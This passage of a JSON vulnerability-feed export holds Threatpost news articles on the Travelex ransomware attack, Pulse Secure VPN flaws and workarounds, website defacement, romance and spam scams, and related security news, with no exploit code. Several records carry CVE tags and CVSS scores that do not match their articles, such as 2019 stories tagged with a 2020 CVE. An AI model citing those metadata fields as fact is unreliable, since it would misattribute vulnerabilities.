Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register &amp; Stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T17:35:34", "type": "threatpost", "title": "US Military Ties Prolific MuddyWater Cyberespionage APT to Iran", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2022-01-13T17:35:34", "id": "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "href": "https://threatpost.com/us-military-ties-muddywater-cyberespionage-apt-iran/177633/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:41", "description": "A Department of Homeland Security (DHS) order now requires agencies to remediate critical vulnerabilities discovered on their systems in 15 days \u2013 cutting in half the previous deadline of 30 days.\n\nThat\u2019s according to a Tuesday binding directive, which is a compulsory order for federal, executive branch, departments and agencies \u201cfor purposes of safeguarding federal information and information systems.\u201d\n\nThe initiative, released by the DHS Cybersecurity and Infrastructure Security Agency (CISA) unit, now requires federal agencies to remediate critical security vulnerabilities within 15 days from the initial detection. Vulnerabilities that are merely \u201chigh\u201d in severity, meanwhile, must be remediated within 30 days after detection.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAs federal agencies continue to expand their internet presence through increased deployment of Internet-accessible systems, and operate interconnected and complex systems, it is more critical than ever for federal agencies to rapidly remediate vulnerabilities that otherwise could allow malicious actors to compromise federal networks through exploitable, externally-facing systems,\u201d according to the [directive](<https://cyber.dhs.gov/bod/19-02/#when-do-the-15-and-30-day-clocks-start-for-remediation>).\n\nThe directive supersedes a previous 2015 DHS order, which ordered departments and agencies to mitigate critical vulnerabilities on their internet-facing systems within 30 days \u201cof issuance of their weekly \u2018Cyber Hygiene report.'\u201d\n\nJeanette Manfra, assistant director for Cybersecurity for CISA, [said](<https://www.dhs.gov/cisa/blog/2019/04/29/cisa-releases-binding-operational-directive-new-requirements-remediating>) that the average time between discovery and exploitation of a vulnerability is decreasing, and adversaries are growing more skilled and persistent.\n\n\u201cCISA released [the directive] to continue to take deliberate steps to reduce the overall attack surface and minimize the risk of unauthorized access to federal information systems,\u201d she said. \u201c[The directive] introduces a shorter mitigation time frame for critical vulnerabilities and a new mitigation time frame for high vulnerabilities, to further reduce the attack surface and risk to federal agency information systems.\u201d\n\nThe directive comes as the government pushes for further security measures across various agencies.\n\nThe DHS [in January](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) ordered all federal agencies to urgently audit Domain Name System (DNS) security for their domains in the next 10 business days, warning that multiple government domains have been targeted by DNS hijacking attacks, allowing attackers to redirect and intercept web and mail traffic.\n\nThe directive also comes as the federal government [in March](<https://threatpost.com/federal-cyber-budget-iot-legislation/142744/>) stepped up its game with proposals of budget line items that would requisition nearly $11 billion for cyber initiatives, and the introduction of an Internet of Things (IoT) Cybersecurity Improvement Act of 2019 (which would require that devices purchased by the government to meet certain minimum security requirements).\n\nWhile security experts praised the initiative, they argued that the directive could go even further in trying to quickly stamp out vulnerabilities across governmental organizations.\n\n\u201cI would argue that the directive does not go far enough to call out critical vulnerabilities for which proofs of concept may already be published or for which developing an exploit is trivial,\u201d said Mounir Hahad, head of Juniper Networks\u2019 Juniper Threat Labs. \u201cThose indeed have a higher chance of being exploited by threat actors in record time. In my view, 15 days for remediation is too slow in those circumstances.\u201d\n", "cvss3": {}, "published": "2019-05-01T19:57:27", "type": "threatpost", "title": "DHS Shortens Deadline For Gov Agencies to Fix Critical Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-05-01T19:57:27", "id": "THREATPOST:06C5D9E6950186757AA989F2557336B3", "href": "https://threatpost.com/dhs-deadline-gov-agencies-fix-critical/144269/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:43", "description": "A famous Brazilian male stripper greeted Cartoon Network viewers worldwide when they tried to stream shows over the weekend \u2013 thanks to a pair of hackers that took aim at the cable network\u2019s websites across 16 different regions.\n\nIn the aftermath, entire Cartoon Network sites and video players have been taken down while remediation continues.\n\nThe Brazilian stripper, Ricardo Milos, is known for wearing a red bandana on his head and an American flag thong. His unique approach to erotic dance fashion has propelled him to [internet meme status](<https://youtu.be/epgz-6ZikHA>); and the hackers, apparent fans, placed Milos videos on the Cartoon Network sites, along with various Arabic memes and Brazilian music vids.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to [reports](<https://www.zdnet.com/article/cartoon-network-websites-hacked-to-show-arabic-memes-and-brazilian-male-stripper/>), the defacement was carried out by a pair of Brazilian hackers who exploited a vulnerability in Cartoon Network\u2019s website management platform. The compromise occurred April 25, and the content stayed up over the weekend until the channel was notified April 28. While the rogue content has been removed, some sites\u2019 video players were still down as of this report.\n\nBoth Cartoon Network UK and Cartoon Network Russia issued short statements [acknowledging](<https://twitter.com/CNUKTweets/status/1122506277224157184>) the issue. In a media statement the network said that \u201csites have been temporarily deactivated\u201d and that IT teams are \u201cworking hard to relaunch the sites.\u201d\n\nThe attack affected Cartoon Network portals for Brazil, the Czech Republic, Denmark, Germany, Hungary, Italy, Mexico, the Middle East and Africa (MENA), the Netherlands, Norway, Poland, Romania, Russia, Turkey and the UK, according to reports from the Twitterverse.\n\n> About 6+ hours ago someone hacked most of the Cartoon Network websites (by language) and replaced them with random shit.\n> \n> List of countries that have been targeted: \n> \n> UK \nHungary \nRomania \nGerman \nRussia \nPoland \nCzech \nDenmark \nArabic \nNorway \nNetherlands \nItaly \nTurkey \nAfrican [pic.twitter.com/anRB2PnP2g](<https://t.co/anRB2PnP2g>)\n> \n> \u2014 Flor Geneva (@Fl0r_Geneva) [April 28, 2019](<https://twitter.com/Fl0r_Geneva/status/1122420981681872896?ref_src=twsrc%5Etfw>)\n\nTypically, website defacement is carried out for political/hacktivist/vendetta purposes, but it\u2019s unclear why the Turner-owned network, home to kids\u2019 hits like Adventure Time, would be a target in this case. The last high-profile defacement came when hackers [infiltrated a Wall Street Journal webpage](<https://threatpost.com/wsj-hacked-pewdiepie/140035/>) in an attempt to promote YouTube celebrity \u201cPewDiePie\u201d (given name Felix Kjellberg), who had come under fire for in the pages of the WSJ for what the outlet termed anti-Semitic behavior.\n\nTaking aim at media targets could be a new trend as well; in April, the Weather Channel\u2019s linear TV feed [was knocked offline](<https://threatpost.com/weather-channel-off-air-hack/143936/>) by a cyberattack \u2013 again, no motive was apparent.\n", "cvss3": {}, "published": "2019-05-01T15:32:40", "type": "threatpost", "title": "Cartoon Network Hacked Worldwide to Show Brazilian Stripper Videos", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-05-01T15:32:40", "id": "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "href": "https://threatpost.com/cartoon-network-hacked/144263/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:51:48", "description": "English actor Jason Statham \u2013 a.k.a. \u201cthe Transporter\u201d \u2013 is cozying up to people who like his Facebook page \u2013 or at least, someone purporting to be him is.\n\nA fraudster managed to bilk a vulnerable and unsuspecting Statham fan out of a \u201csignificant amount\u201d of money after approaching her while she was perusing a fan page for the actor on Facebook.\n\n\u201cShe thought it was nice that the actor had seemingly embraced \u2018talking to his fans,\u2019 and she admitted that she was also in a vulnerable place after recently losing her mother and fianc\u00e9,\u201d explained researchers at Tripwire, who flagged the incident in a [Monday post](<https://www.tripwire.com/state-of-security/latest-security-news/fraudster-posed-as-jason-statham-to-prey-upon-star-struck-users/>). \u201cShe therefore felt no unease when the fraudster asked her to talk with them over WhatsApp.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA truly bad romance ensued, with hundreds of WhatsApp messages flying between the two over the course of months, during with Faux Statham professed his undying love: \u201cWill you love me and be the special woman beside me for the rest of your life honey\u201d reads one of the messages.\n\nAfter a pattern of trust was established, the supposed action-hero actor started to complain about financial difficulties due to a delayed film payment: \u201cI really need you to do this for me honey \u2019cause I can\u2019t trust anyone but you with my money honey.\u201d\n\nThe victim proceeded to send Western Union an undisclosed sum, after which the supposed Statham disappeared.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30163632/Statham-fraud.png>)\n\nSource: BBC\n\nAs detective constable Craig Moylon of the Greater Manchester Police in the UK [told the BBC](<https://www.bbc.com/news/uk-england-manchester-47969165>), \u201cThis lady has been subject to somebody who just tricked her at a very vulnerable time in her life. When you see the relentless messaging that this lady got from this person and you see the grooming and the exploitation\u2026 the impact is extraordinary.\u201d\n\nThe gullibility of the victim stood out to Tyler Reguly, manager of security R&amp;D at Tripwire. He linked it to generational and cultural norms.\n\n\u201cThis is typically what I find most surprising about [successful scams](<https://threatpost.com/godaddy-shutters-subdomains-snake-oil/144147/>),\u201d he told Threatpost in an interview. \u201cThere\u2019s a desire to believe, no matter how unlikely the scenario. We\u2019re a society of dreamers \u2013 \u2018I can win the lottery,\u2019 \u2018I can marry Celebrity X,\u2019 \u2018I can perform on stage alongside Singer Y\u2019 \u2013 and unfortunately, modern generations are being brought up to put even more belief in their dreams. So, while we have more tech savvy individuals, we have more potential targets for these criminals.\u201d\n\nThis scam also highlights the ingenuity of bad actors who prey upon unsuspecting users on social media, according to Tripwire.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30164155/Jason-Statham-008.jpg>)\n\n\u201cI would suspect that they setup a fan page for a celebrity and then contacted people via that fan page, claiming to be the celebrity,\u201d Reguly said. \u201cAlternatively, they may have been looking for people who publicly \u2018liked\u2019 a real Jason Statham page and reached out to those users, which is why it is important to verify the identity of those sending messages before you respond. In the case of the former, Facebook has done a great job of providing verified pages (similar to Twitter\u2019s verified users) that make it easy to tell when you\u2019re looking at a page associated with a known entity. (Specifically: \u2018A blue verification badge confirms that this is an authentic Page for this public figure, media company or brand\u2019).\u201d\n\nThese types of scams are on the rise, precisely because they\u2019re successful.\n\n\u201cI\u2019d be willing to wager that it is starting to become relatively common,\u201d Reguly said. \u201cPeople tend to have a soft spot for celebrities, we see people stand in line for hours to catch a glimpse of their favorite star filming, or pay hundreds of dollars for a quick handshake and autograph at conventions. We have a desire to connect with people who have had a meaningful impact in our lives, and that is quite commonly celebrities, particularly those that filled a role near and dear to our hearts or that sung a song that has always stuck with us\u2026.These scams work because we want to believe.\u201d\n", "cvss3": {}, "published": "2019-04-30T21:24:20", "type": "threatpost", "title": "Fake Jason Statham Bilks a Fan Out of Serious Money", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-30T21:24:20", "id": "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "href": "https://threatpost.com/fake-jason-statham-fan-money/144247/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-02T22:02:21", "description": "The Sodinokibi ransomware strain is apparently behind the New Year\u2019s Eve attack on foreign currency-exchange giant Travelex, which has left its customers and banking partners stranded without its services.\n\nThe criminals behind the attack are demanding a six-figure sum in return for the decryption key, according to reports, and are directing the company to a payment website hosted in Colorado.\n\n\u201cIt is just business. We absolutely do not care about you or your details, except getting benefits. If we do not do our work and liabilities \u2013 nobody will not co-operate with us. It is not in our interests,\u201d the [readme file](<https://www.computerweekly.com/news/252476283/Cyber-gangsters-demand-payment-from-Travelex-after-Sodinokibi-attack>) for the ransomware, obtained by Computer Weekly, said. \u201cIf you do not cooperate with our service \u2013 for us it does not matter. But you will lose your time and your data, cause just we have the private key. In practice time is much more valuable than money.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSodinokibi, also known as REvil, appeared in April 2019. It has been responsible for a string of high-profile hits, including attacks on [22 Texas municipalities](<https://threatpost.com/the-texas-ransomware-attacks-a-gamechanger-for-cybercriminals/147597/>) and [various dentist offices](<https://threatpost.com/news-wrap-dentist-offices-hit-by-ransomware-venmo-faces-privacy-firestorm/147856/>) around the country. Researchers from Secureworks Counter Threat Unit (CTU) believe that the group behind the infamous GandCrab ransomware, which earlier this year [claimed to have retired](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>), is actually [responsible for Sodinokibi](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>), given that the string decoding functions and other code aspects employed by Sodinokibi and GandCrab are nearly identical.\n\nTravelex, a ubiquitous fixture at airports, provides foreign-exchange services in 70 countries across more than 1,200 retail branches. The attack resulted in Travelex websites in at least 20 countries going offline, left its retail locations to carry out tasks manually, and many customers remain stranded without travel money. Its global banking partners, including Barclays, First Direct, HSBC, Sainsbury\u2019s Bank, Tesco and Virgin Money, have also been left adrift with no way to buy or sell foreign currency.\n\nIt\u2019s unclear whether the company plans to pay the ransom, and it has offered no timeline on cleanup. While the company has [admitted the attack](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>), many of its websites merely are showing a [warning screen](<https://www.travelex.com/news-room>) saying that they\u2019re down for \u201cplanned maintenance.\u201d\n\nIt has not returned Threatpost\u2019s requests for comment.\n\n## Unpatched Pulse Secure Servers\n\nThe attack could have been successful in part because Travelex took several months to patch critical vulnerabilities in its Pulse Secure VPN servers, according to Bad Packets.\n\nPulse Secure offers a popular enterprise remote access family of products. The company issued an urgent patch for two critical vulnerabilities in its Zero Trust VPN product in April. CVE-2019-11510 is an arbitrary file reading vulnerability allows sensitive information disclosure enabling unauthenticated attackers to access private keys and user passwords, according to the advisory; further exploitation using the leaked credentials can lead to remote command injection (CVE-2019-11539) and allow attackers to gain access inside private VPN networks.\n\n\u201cThat vulnerability is incredibly bad \u2014 it allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords),\u201d explained researcher Kevin Beaumont (a.k.a. Gossi the Dog), [in a posting](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) this week.\n\nHe said that in August, he became aware that public exploits had been made available and that cybercriminals including APTs were actively scanning the internet for the issue (using public tools like the Shodan search engine). A corresponding [report from Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) that month indicated that major cyberattacks could be imminent.\n\n\u201cOn August 25th 2019, Bad Packets scanned the internet and [found almost 15,000 endpoints](<https://twitter.com/bad_packets/status/1165574263975186433>) across the world had the issue directly exploitable,\u201d Beaumont noted. \u201cThose results included networks at governments across the world \u2014 many incredibly sensitive organizations included \u2014 and basically a list of the world\u2019s largest companies. It was clear organizations were simply [not patching](<https://twitter.com/GossiTheDog/status/1213532072201084929>).\u201d\n\nOne of these organizations was Travelex, which had seven unsecured Pulse Secure servers, according to Bad Packets; it also said that the company waited until November \u2013 eight months after the vulnerability disclosure \u2013 to patch the issues.\n\n> We notified Travelex about their vulnerable Pulse Secure VPN servers on September 13, 2019.\n> \n> No response. [pic.twitter.com/lCjk7IY3OM](<https://t.co/lCjk7IY3OM>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 4, 2020](<https://twitter.com/bad_packets/status/1213536922825420800?ref_src=twsrc%5Etfw>)\n\nBad Packets [indicated](<https://twitter.com/bad_packets/status/1214255496900665344>) that this lag time could have provided the window in which the cybergang infiltrated the Travelex network \u2013 a speculation that is somewhat supported by Pulse Secure itself, which issued [a statement](<https://twitter.com/zackwhittaker/status/1214315001844031488/photo/1>) this week that it has indeed seen the Sodinokibi ransomware being delivered via exploits for the vulnerabilities.\n\n\u201cThe ransomware situation at Travelex shines a harsh spotlight on the potential devastation of a cybersecurity incident,\u201d Jonathan Knudsen, senior security strategist at Synopsys, said in an emailed statement. \u201cThe lost business and negative publicity from a scenario such as this can be crushing. Ransomware continues to be a popular tool for cybercriminals\u2026If you fall victim to a ransomware attack, you must have a plan ready to execute. The plan should include removing infected systems from your network, wiping them and reinstalling the operating system and applications, then restoring data from your backups.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-07T17:04:09", "type": "threatpost", "title": "Sodinokibi Ransomware Behind Travelex Fiasco: Report", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539"], "modified": "2020-01-07T17:04:09", "id": "THREATPOST:C535D98924152E648A3633199DAC0F1E", "href": "https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-25T17:54:37", "description": "Pulse Secure has issued a workaround for a critical remote-code execution (RCE) vulnerability in its Pulse Connect Secure (PCS) VPNs that may allow an unauthenticated, remote attacker to execute code as a user with root privileges.\n\nPulse Secure\u2019s parent company, Ivanti, issued an out-of-band [advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) on May 14. The company explained that this high-severity bug \u2013 identified as [CVE-2021-22908](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22908>) and rated CVSS 8.5 \u2013 affects Pulse Connect Secure versions 9.0Rx and 9.1Rx.\n\n\u201cBuffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\u201d according to the advisory. \u201cAs of version 9.1R3, this permission is not enabled by default.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe CERT Coordination Center issued a [report](<https://kb.cert.org/vuls/id/667933>) about the vulnerability, explaining that the problem stems from a buffer overflow vulnerability in the PCS gateway. CERT/CC explained that the gateway\u2019s ability to connect to Windows file shares through a number of CGI endpoints could be leveraged to carry out an attack.\n\n\u201cWhen specifying a long server name for some SMB operations, the `smbclt` application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\u201d CERT/CC noted. PCS 9.1R11.4 systems are vulnerable: CERT/CC said that it\u2019s managed to trigger the vulnerability by targeting the CGI script `/dana/fb/smb/wnf.cgi`, although \u201cOther CGI endpoints may also trigger the vulnerable code.\u201d\n\nThere\u2019s currently no practical solution to this problem, at least not that CERT/CC is aware of, according to Will Dormann, who both discovered the vulnerability and wrote up the CERT/CC report. He offered two workarounds:\n\n## Fix No. 1: Apply XML Workaround\n\nPulse Secure has published a quick fix: a Workaround-2105.xml file with a mitigation to protect against the vulnerability. \u201cImporting this XML workaround will activate the protections immediately,\u201d according to Dormann\u2019s report, and \u201cdoes not require any downtime for the VPN system.\n\nThe workaround blocks requests that match these URI patterns:\n\n`^/+dana/+fb/+smb` \n`^/+dana-cached/+fb/+smb`\n\nDormann advised users to note that `Workaround-2105.xml` will automatically deactivate the mitigations applied by an earlier workaround, `Workaround-2104.xml`. That makes it \u201cimperative that a PCS system is running 9.1R11.4 before applying the `Workaround-2105.xml` mitigation,\u201d he said, to ensure that the vulnerabilities outlined in [SA44784](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784>) aren\u2019t reintroduced as the result of applying the workaround.\n\nThe workaround will block the ability to use Windows File Share Browser.\n\n## Fix No. 2: Set a Windows File Access Policy\n\nDormann said that a PCS system that started as 9.1R2 or earlier will retain the default Initial File Browsing Policy of Allow for `\\\\*` SMB connections, which will expose this vulnerability. He advised users to check out the administrative page for the PCS, at `Users -> Resource Policies -> Windows File Access Policies` to view current SMB policy.\n\nA PCS policy that explicitly allows `\\\\*` or otherwise \u201cmay allow users to initiate connections to arbitrary SMB server names,\u201d Dormann advised, telling users to \u201cconfigure the PCS to Deny connections to such resources to minimize your PCS attack surface.\u201d\n\n## Add One More to the Growing List of Vulnerabilities\n\nDirk Schrader, global vice president of security research at New Net Technologies, told Threatpost on Tuesday that it\u2019s \u201cnot exaggerated\u201d to assign such a high severity score to this vulnerability. \u201cPrivilege escalations are a central element in many attack vectors, and this one would allow a root-privileged operation,\u201d he noted via email.\n\nGiven that resources on cybersecurity teams are limited, a \u201cquick fix\u201d like what Pulse Secure issued \u2013 i.e., the XML files \u2013 is concerning, Schrader said. \u201cThe quick fix, if applied with no further consideration, [could] re-introduce more severe vulnerabilities recently discovered,\u201d he said.\n\nThose recently discovered vulnerabilities include:\n\n * **May: **Earlier this month, a [critical zero-day](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) flaw in Pulse Secure\u2019s Connect Secure VPN devices was being used by at least two advanced persistent threat (APT) groups, likely linked to China, to attack U.S. defense, finance and government targets, as well as victims in Europe. That one wasn\u2019t a one-off: At the same time, Pulse Secure also patched three other security bugs, two of them also critical RCE vulnerabilities. Attacker activity around the zero day was so high that it prompted the Cybersecurity and Infrastructure Security Agency (CISA) [to issue an alert](<https://cyber.dhs.gov/ed/21-03/>) warning businesses of the campaigns, which [FireEye Mandiant](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) telemetry indicates have been carried out by two main APT clusters with links to China: UNC2630 and UNC2717. [CISA told CNN](<https://itwire.com/security/five-us-government-agencies-attacked-through-pulse-secure-vpns.html>) that it was aware of at least five federal civilian agencies who were attacked through Pulse Secure VPNs.\n * **April:** [The FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n * **April**: The Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n * **October**: CISA said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n052521 13:35 UPDATE: Threatpost has requested details from Pulse Secure about whether a permanent fix is in the works.\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-25T14:57:53", "type": "threatpost", "title": "Pulse Secure VPNs Get Quick Fix for Critical RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-22908"], "modified": "2021-05-25T14:57:53", "id": "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "href": "https://threatpost.com/pulse-secure-vpns-critical-rce/166437/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T12:04:44", "description": "Researchers at the security firm Palo Alto Networks worked with domain registrar and web hosting firm GoDaddy to shut down 15,000 subdomains pitching \u2018snake oil\u2019 products and other scams. The takedowns are linked to affiliate marketing campaigns peddling everything from weight-loss solutions and brain-enhancement pills.\n\nThose behind the spam campaigns used a technique called domain-shadowing, and they were able to compromise thousands of servers and abuse hundreds of domains and website admin account credentials, according to researchers.\n\nSpam campaigns associated with these subdomain takeovers date back to 2017. Links in messages pointed to subdomains of websites, which unknowingly hosted the product pitches that were backed by bogus endorsements purporting to be from the likes of Stephen Hawking, Jennifer Lopez and Gwen Stefani.\n\n\u201cOn a scale of one to 10 for the \u2018worst types of spam\u2019 you can receive, approaching that perfect 10 score is spam related to \u2018snake oil\u2019 products that are so patently fake that you struggle to understand why they would even bother trying to sell it,\u201d wrote Jeff White, senior threat researcher at Palo Alto Networks, [in a blog post outlining the takedown](<https://unit42.paloaltonetworks.com/takedowns-and-adventures-in-deceptive-affiliate-marketing/>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/26131443/Figure-13-TMZ-pre-sell-page.png>)\n\nExample of a \u201cfarticle\u201d extolling the merits of a dubious pill, solution or potion. Farticle is a term used to describe a fraudulent article. (Click to Enlarge)\n\nWhite investigated and traced the links in the spam messages to an elaborate URL redirection chain that eventually dumped users on the fake products\u2019 landing pages. The redirections, researchers discovered, were leveraging compromised servers. To help obfuscate the sketchy behavior, spammer also used a [Caesar cipher](<http://www.practicalcryptography.com/ciphers/caesar-cipher/>) (a simple substitution code) and a hypertext preprocessor (PHP) file for handling the redirections.\n\n\u201cThe [Caesar cipher] injection is using .php files on compromised sites to drive traffic to fraudulent and/or scam pages,\u201d [according to a researcher at PassiveTotal](<https://www.riskiq.com/blog/labs/caesarv/>) that White consulted with during his investigation. \u201c[These included] fake tech support and fake sites purporting to be news sites, reporting on the incredible effects of weight-loss and intelligence pills.\u201d\n\nNext, White determined that the redirection sites and those that hosted the spam pitches were using legitimate registrant accounts in a technique called domain-shadowing. That\u2019s when attackers use stolen domain registrant credentials to create massive lists of subdomains, which are used in quickly rotating fashion to either redirect victims to attack sites, or to serve as hosts for malicious payloads. This technique is considered an evolution of [fast-flux](<https://threatpost.com/operation-high-roller-banked-fast-flux-botnet-steal-millions-102412/77150/>), where malicious elements are moved from place to place rapidly, in an effort to stay ahead of detection.\n\n\u201cIt would seem likely that the person(s) behind [the campaigns] were going about it in an automated fashion, logging into these legitimate domain accounts and using a dictionary of simple English words to create subdomains pointing to their redirector,\u201d said the researcher.\n\nThis isn\u2019t the first time GoDaddy has had to deal domain-shadowing used to link to malicious activity. Over the years the approach has been used to distribute [everything from the Angler Exploit Kit](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396/>) to [the RIG Exploit Kit](<https://threatpost.com/40000-subdomains-tied-to-rig-exploit-kit-shut-down/126072/>).\n\nWhile in White\u2019s case the payload wasn\u2019t malware, but rather affiliate marketing scams, he warned of the malicious nature of those behind the spam campaigns: \u201cThere are a lot of players in the affiliate marketing world, from the affiliates to the merchants and all of the networks in-between,\u201d he said. \u201cHopefully this blog helps to shine some light on how at every link in this chain there are shady, sometimes illegal and almost always deceptive business practices still being employed, to scam hard working people out of their money.\u201d\n", "cvss3": {}, "published": "2019-04-26T17:47:01", "type": "threatpost", "title": "GoDaddy Shutters 15,000 Subdomains Tied to 'Snake Oil' Scams", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688"], "modified": "2019-04-26T17:47:01", "id": "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "href": "https://threatpost.com/godaddy-shutters-subdomains-snake-oil/144147/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-30T22:30:33", "description": "A critical Linux bug has been discovered that could allow attackers to fully compromise vulnerable machines. A fix has [been proposed](<https://www.mail-archive.com/linux-kernel@vger.kernel.org/msg2132949.html>) but has not yet been incorporated into the Linux kernel.\n\nThe flaw ([CVE-2019-17666](<https://nvd.nist.gov/vuln/detail/CVE-2019-17666>)), which was [classified as critical](<https://vuldb.com/?id.143835>) in severity, exists in the \u201crtlwifi\u201d driver, which is a software component used to allow certain Realtek Wi-Fi modules, used in Linux devices, to communicate with the Linux operating system.\n\nSpecifically, the driver is vulnerable to a [buffer overflow](<https://cwe.mitre.org/data/definitions/122.html>) attack, where a buffer (a region in physical memory storage used to temporarily store data while it is being moved) is allocated in the heap portion of memory (a region of process\u2019s memory which is used to store 